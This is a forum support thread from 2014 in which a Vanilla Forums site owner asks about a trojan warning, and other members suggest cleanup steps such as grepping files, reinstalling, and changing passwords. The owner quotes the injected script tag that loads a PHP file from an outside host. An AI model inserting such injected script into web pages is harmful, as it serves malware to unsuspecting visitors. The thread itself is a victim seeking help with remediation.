Please upgrade here. These earlier versions are no longer being updated and have security issues.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.
Options

PC compromised

SchryversSchryvers
edited November 2014 in Vanilla 2.0 - 2.8

When i visited today my forum, there popups an security popup from my Avast! security system on my pc saying my forum has an trojan detected on it.

And the page speed i mindblowing slow, first time i loaded it it needs to get 5 minutes waiting on some request from a .de website...

So i checked out my source code, and i found some code after my </html> tag...

</body></html><script type="text/javascript" src="http:// babsy. cwsurf.de/sicherung/Utherverse/hwhbfxcl.php?id=2332630"></script>

I didn't place that there, also cant find it in my default.master.tpl or elsewhere...

Whatttttt is this? The last thing i did was update from 2.1.3 to 2.1.5....

website is tattootalk.nl (so, lets carefull my computer says it has an trojan, but does not block the entire website...)

Anyone?

«1

Answers

  • Options
    peregrineperegrine MVP
    edited November 2014

    are you using any insecure plugins that you have been told not to use? or using cleditor in an insecure way.

    perhaps your computer is infected and you infected your forum

    ask your host if they can see how you were infected. they provide support relating to this.

    the "free advice" I can give.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.

  • Options

    Yes, im using that poll plugin?

  • Options

    Some strange thing happen!!! My Shoutbox doesn't work anymore.......... didn't change things at least for a week and everything worked smoothly yesterday.

  • Options
    peregrineperegrine MVP
    edited November 2014

    ask your host to restore, and only use secure versions of vanilla software, clean your local pc. and don't use insecure plugins.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.

  • Options

    Shitttt! But who says it comes from either the shoutbox or poll plugin?

    I dont get it away, disabled them both but the code is there after the </html> tag

    My host to restore? can they do that? :\

  • Options
    x00x00 MVP
    edited November 2014

    It could be that asperegrine says your computer or some other computer that has access to your server is infect then upload the payload, piggybacking your session. This is particularly a possibility if you keep getting reinfected.

    Post an an example of the code does it have base64_decode, eval, etc?

    Or in general your server security is comprised then you can .

    There were of couple of very serious security vulnerabilities in linux systems, that could be use to do pretty much anything if they didn't update the OS.

    I doubt it is from XSS in the forum software itself, I know a fair bit about this.

    grep is your friend.

  • Options
    x00x00 MVP
    edited November 2014

    You will almost certainly going to need to replace all those files, but if you don't find the source you may be infected again.

    If your file permission are set correctly then the infection is more likely to be using you, or someone with your level of privileges to infect the files.

    grep is your friend.

  • Options
    SchryversSchryvers
    edited November 2014

    I cant get the code here so im doing an image

    This script tag after the html get included on every page... but i dont know if thats the trojan, cause my trojan says someting like 3842349library{gzip} but that message of the trojan i dont get anymore only the first time i loaded the site...


    Im using windows xp, sp3... thats important? my computer scan says there are no infections are whatever on my pc.

    test.jpg 143.2K
  • Options
    x00x00 MVP
    edited November 2014

    yes your file are likely infected.

    try lookign in the files such as index.php compare with a clean copy.

    grep is your friend.

  • Options

    if you find it can you please not screen shot it. Instead put the code like so

    ~~~
    [code here]
    ~~~
    

    Screen shots of text drive me up the wall.

    grep is your friend.

  • Options
    peregrineperegrine MVP
    edited November 2014

    I don't know why you are changing the discussion title.

    if your goal is to bring your forum back,

    you need to re-install version 2.1.5. if you are not re-infecting your host from your local pc.

    if you don't have a trojan or virus, reinstalling 2.1.5 won't hurt.

    as well as talk to your host about server OS vulnerabilties as x00 suggested.

    if your goal is to find out what may have happened - zip up your forum folder and explore it later, being careful, not to re-infect.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.

  • Options

    @Linc‌ can you change the title of this discussion to something more descriptive. Thanks

    grep is your friend.

  • Options

    WOW I didnt change that!!!!!!

  • Options

    I dont change that title! What is going on, my pc is infected?

  • Options

    @Schryvers said:
    WOW I didnt change that!!!!!!

    perhaps someone now has your login name and password for vanilla forums, if a moderator didn't change the title and you didn't.

    I suggest after you bring your forum back on-line - change all passwords to database as well as admin passwords. And if someone has compromised your login and passwords for other sites, change them as well.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.

  • Options

    grep is your friend.

  • Options

    I didn't changed it into PC compromised not !!!!!!!

  • Options
    LincLinc Detroit Admin
    edited November 2014

    I edited the title as requested by x00. Calm down.

  • Options

    In changed my pass here on the site.

  • Options
    peregrineperegrine MVP
    edited November 2014

    @Linc said:
    I edited the title as requested by x00. Calm down.

    but who edited it to hgtonight's email address is the big question.

    I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.

Sign In or Register to comment.